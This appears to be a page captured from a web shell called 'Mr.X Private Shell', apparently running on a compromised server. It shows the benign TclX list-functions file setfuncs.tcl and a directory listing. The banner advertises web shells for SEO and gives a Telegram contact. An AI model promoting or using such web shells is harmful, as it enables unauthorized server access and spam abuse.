__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# setfuncs --
#
# Perform set functions on lists. Also has a procedure for removing duplicate
# list entries.
#------------------------------------------------------------------------------
# Copyright 1992-1999 Karl Lehenbauer and Mark Diekhans.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted, provided
# that the above copyright notice appear in all copies. Karl Lehenbauer and
# Mark Diekhans make no representations about the suitability of this
# software for any purpose. It is provided "as is" without express or
# implied warranty.
#------------------------------------------------------------------------------
# $Id: setfuncs.tcl,v 1.1 2001/10/24 23:31:48 hobbs Exp $
#------------------------------------------------------------------------------
#
#@package: TclX-set_functions union intersect intersect3 lrmdups
#
# return the logical union of two lists, removing any duplicates
#
proc union {lista listb} {
return [lrmdups [concat $lista $listb]]
}
#
# sort a list, returning the sorted version minus any duplicates
#
proc lrmdups list {
if [lempty $list] {
return {}
}
set list [lsort $list]
set last [lvarpop list]
lappend result $last
foreach element $list {
if ![cequal $last $element] {
lappend result $element
set last $element
}
}
return $result
}
#
# intersect3 - perform the intersecting of two lists, returning a list
# containing three lists. The first list is everything in the first
# list that wasn't in the second, the second list contains the intersection
# of the two lists, the third list contains everything in the second list
# that wasn't in the first.
#
proc intersect3 {list1 list2} {
set la1(0) {} ; unset la1(0)
set lai(0) {} ; unset lai(0)
set la2(0) {} ; unset la2(0)
foreach v $list1 {
set la1($v) {}
}
foreach v $list2 {
set la2($v) {}
}
foreach elem [concat $list1 $list2] {
if {[info exists la1($elem)] && [info exists la2($elem)]} {
unset la1($elem)
unset la2($elem)
set lai($elem) {}
}
}
list [lsort [array names la1]] [lsort [array names lai]] \
[lsort [array names la2]]
}
#
# intersect - perform an intersection of two lists, returning a list
# containing every element that was present in both lists
#
proc intersect {list1 list2} {
set intersectList ""
set list1 [lsort $list1]
set list2 [lsort $list2]
while {1} {
if {[lempty $list1] || [lempty $list2]} break
set compareResult [string compare [lindex $list1 0] [lindex $list2 0]]
if {$compareResult < 0} {
lvarpop list1
continue
}
if {$compareResult > 0} {
lvarpop list2
continue
}
lappend intersectList [lvarpop list1]
lvarpop list2
}
return $intersectList
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| arrayprocs.tcl | File | 1.6 KB | 0644 |
|
| autoload.tcl | File | 2.22 KB | 0644 |
|
| buildhelp.tcl | File | 15.61 KB | 0644 |
|
| compat.tcl | File | 9.8 KB | 0644 |
|
| convlib.tcl | File | 3.86 KB | 0644 |
|
| edprocs.tcl | File | 1.95 KB | 0644 |
|
| events.tcl | File | 1.03 KB | 0644 |
|
| fmath.tcl | File | 2.19 KB | 0644 |
|
| forfile.tcl | File | 1.4 KB | 0644 |
|
| globrecur.tcl | File | 3.11 KB | 0644 |
|
| help.tcl | File | 10.36 KB | 0644 |
|
| libtclx8.4.so | File | 155.52 KB | 0755 |
|
| pkgIndex.tcl | File | 77 B | 0644 |
|
| profrep.tcl | File | 5.1 KB | 0644 |
|
| pushd.tcl | File | 1.83 KB | 0644 |
|
| setfuncs.tcl | File | 2.92 KB | 0644 |
|
| showproc.tcl | File | 1.46 KB | 0644 |
|
| stringfile.tcl | File | 1.38 KB | 0644 |
|
| tcllib.tcl | File | 4.32 KB | 0644 |
|
| tclx.tcl | File | 2.05 KB | 0644 |
|